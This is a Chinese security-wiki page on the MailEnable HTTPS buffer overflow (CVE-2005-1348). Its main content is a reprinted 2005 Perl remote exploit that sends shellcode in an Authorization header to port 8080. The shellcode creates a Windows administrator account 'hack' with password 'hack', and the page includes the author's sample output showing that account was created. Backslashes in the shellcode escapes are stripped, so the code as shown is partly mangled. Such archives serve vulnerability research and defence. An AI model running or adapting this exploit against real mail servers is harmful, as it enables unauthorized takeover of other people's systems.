子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

MailEnable HTTPS缓冲区溢出漏洞

370

MailEnable HTTPS缓冲区溢出漏洞

漏洞ID 1108706 漏洞类型 缓冲区溢出
发布时间 2005-04-25 更新时间 2005-05-02
图片[1]-MailEnable HTTPS缓冲区溢出漏洞-安全小百科CVE编号 CVE-2005-1348
 		图片[2]-MailEnable HTTPS缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200505-200
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/952
https://www.securityfocus.com/bid/88727
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-200
|漏洞详情
MailEnable对于头选项的处理存在漏洞,远程攻击者可能攻击者可能利用此漏洞在主机上执行任意指令。
|漏洞EXP
#!/usr/bin/perl
# This tools and to consider only himself to educational purpose
#
# 
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:Documents and SettingsAdministratorDesktopprova bofmailenable-bug+exploit
#>net users
#
#Account utente per \SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket; 
$ret = "x6cx36xb7"; #RET For Win2003
$nop = "x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x33xc9x83xe9xcaxd9xeexd9x74x24xf4x5bx81x73x13xc7".
"x7ex10xf5x83xebxfcxe2xf4x3bx96x56xf5xc7x7ex9bxb0".
"xfbxf5x6cxf0xbfx7fxffx7ex88x66x9bxaaxe7x7fxfbx16".
"xe9x37x9bxc1x4cx7fxfexc4x07xe7xbcx71x07x0ax17x34".
"x0dx73x11x37x2cx8ax2bxa1xe3x7ax65x16x4cx21x34xf4".
"x2cx18x9bxf9x8cxf5x4fxe9xc6x95x9bxe9x4cx7fxfbx7c".
"x9bx5ax14x36xf6xbex74x7ex87x4ex95x35xbfx71x9bxb5".
"xcbxf5x60xe9x6axf5x78xfdx2ex75x10xf5xc7xf5x50xc1".
"xc2x02x10xf5xc7xf5x78xc9x98x4fxe6x95x91x95x1dx9d".
"x28xb0xf0x95xafxe6xeex7fxc9x29xefx12x2fx90xefx0a".
"x38x1dx7dx91xe9x1bx68x90xe7x51x73xd5xa9x1bx64xd5".
"xb2x0dx75x87xe7x16x71x96xacx5ex78x94xa4x15x30xda".
"x86x3ax54xd5xe1x58x30x9bxa2x0ax30x99xa8x1dx71x99".
"xa0x0cx7fx80xb7x5ex51x91xaax17x7ex9cxb4x0ax62x94".
"xb3x11x62x86xe7x16x71x96xacx5ex3fxb4x83x3ax10xf5";

use Getopt::Std; getopts('h:', %args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-n";
print STDERR "-=[                                                               ]=-n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-nn";

if (!defined($host)) {
Usage();
}

$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0rn";
$ric2 = "Authorization: $bofrnrn";
$richiesta = $ric.$ric2;
print "[+]Connecting to $hostn";
sleep 2;
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Evil Requestn";
                                sleep 2;
                                print $socket "$richiesta";
                                print "[+]Creating Administrator Usern";
                                print "Connect to $host Using User (hack) Pass (hack)n";
                                
                               
close;

sub Usage {
print STDERR "Usage:
-h Victim host.nn";
exit;
}

# milw0rm.com [2005-04-25]
|受影响的产品
MailEnable MailEnable Professional 1.54
|参考资料

来源:BUGTRAQ
名称:20050424MailEnableHTTPSBufferOverflow[x0n3-h4ck]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111445834220015&w;=2
来源:MISC
链接:http://www.x0n3-h4ck.org/upload/x0n3-h4ck_mailenable_https.pl
来源:OSVDB
名称:15737
链接:http://www.osvdb.org/15737
来源:SECTRACK
名称:1013786
链接:http://securitytracker.com/id?1013786

相关推荐: ISC DHCP客户端缓冲区溢出漏洞

ISC DHCP客户端缓冲区溢出漏洞 漏洞ID 1206417 漏洞类型 输入验证 发布时间 2000-06-24 更新时间 2005-05-02 CVE编号 CVE-2000-0585 CNNVD-ID CNNVD-200006-098 漏洞平台 N/A C…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
网络安全漏洞
# 漏洞# cnnvd# https
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion
3年前 4771
安全小百科-帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
帆软10.0 Getshell漏洞分析
3年前 1194
安全小百科-使用GOST搭建一个简单的端口转发
使用GOST搭建一个简单的端口转发
使用GOST搭建一个简单的端口转发
3年前 590
安全小百科-Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
3年前 588
安全小百科-Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability
3年前 531
安全小百科-iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞
3年前 523
搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020430
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012860
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011940
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010510
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666